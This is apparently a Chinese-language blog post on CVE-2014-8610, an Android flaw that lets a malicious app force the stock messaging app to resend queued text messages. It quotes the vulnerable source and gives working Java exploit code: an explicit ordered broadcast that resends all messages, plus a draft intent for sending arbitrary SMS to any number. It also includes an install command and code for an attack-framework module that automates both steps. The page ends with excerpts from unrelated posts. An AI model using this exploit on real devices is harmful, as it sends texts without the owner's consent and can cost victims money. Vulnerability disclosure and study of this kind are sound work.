CVE 2014 8610 簡訊重發漏洞

2021-07-25 13:46:01 字數 2235 閱讀 9852

漏洞原始碼位址[2],如果惡意軟體傳送廣播「com.android.mms.transaction.message_sent」,並且傳送結果碼result_error_radio_off,它會觸發原始碼裡的handlesmssent方法,如以下**:

private


void


handlesmssent(intent intent, int error) else


if ((mresultcode == smsmanager.result_error_radio_off) || (mresultcode == smsmanager.result_error_no_service)) 


// we got an error with no service or no radio. register for state changes so


// when the status of the connection/radio changes, we can try to send the


// queued up messages.


registerforservicestatechanges();


// we couldn』t send the message, put in the queue to retry later.


sms.movemessagetofolder(this, uri, sms.message_type_queued, error);
如原始碼注釋所說,handlesmssent得到乙個沒有服務或者廣播被關閉的錯誤,呼叫registerforservicestatechanges方法改變狀態,將簡訊加入佇列中,以後傳送。

intent intent= new intent(「com.android.mms.transaction.message_sent」);


intent.setdata(uri.parse(「content://sms」));


intent.setclassname(「com.android.mms」, 「com.android.mms.transaction.smsreceiver」);


sendorderedbroadcast(intent,null,null,null,smsmanager.result_error_radio_off,null,null);
注意:

1.uri不指定id的話,意味著全部簡訊重發,如:content://sms

2.必須使用顯示intent

3.一旦簡訊被加入佇列就會自動傳送出去

我們可以先建立乙個草稿信件,來達到傳送任意簡訊的目的:

intent intent1 = new intent(「android.intent.action.sendto」);


intent1.setdata(uri.parse(「smsto:yourphonenumber」));


intent1.putextra(「sms_body」, 「another test sms1!」);


startactivity(intent1);
模組原始碼位址[3],模組的安裝可以直接遠端安裝

module install whfs.smsdraftsend
以下是模組的關鍵**:

self.stdout.write("[+] drafting sms message to send.\n")


#sleep(2)


self.draftsms(arguments)


#sleep(2)


intent = android.intent(component=(arguments.component[0], arguments.component[1]), flags=['activity_new_task'])


if intent.isvalid():


self.getcontext().startactivity(intent.buildin(self))


else:


sleep(2)


self.stdout.write("[+] sending draft messages.\n")


self.smsordered(arguments, self.result_error_radio_off)


self.stdout.write("[+] message sent.\n")
參考:

[1][3]

CVE申請系列(1) CVE簡介

參考 cve申請的那些事 cve的全稱是 common vulnerabilities and exposures 翻譯成中文就是 公共漏洞和披露 它相當於乙個蒐集了很多安全漏洞的漏洞庫,不同的漏洞資訊對應著乙個不同的cve編號,所謂申請cve也就是申請乙個cve編號。cna的全稱是 cve num...

CVE引發的欺騙

研究人員在尋找瀏覽器前端安全問題時發現chrome,safari,firefox等瀏覽器中都存在安全漏洞。本文介紹蘋果產品字母d字形問題造成的網域名稱欺騙問題。u a771 研究人員發現蘋果產品中的拉丁小寫字母dum u a771 和拉丁小寫字母d u 0064 的字形非常相像。從標準的unicod...

CVE 2010 0188除錯報告

一 tiff檔案格式介紹 1 影象檔案頭 image file header 簡稱ifh ifh資料結構包含 3個成員共計 8個位元組,byte order 成員可能是 mm 0x4d4d 或 ii 0x4949 0x4d4d 表示該tiff 圖是motoral整數格式 0x4949 表示該圖是 i...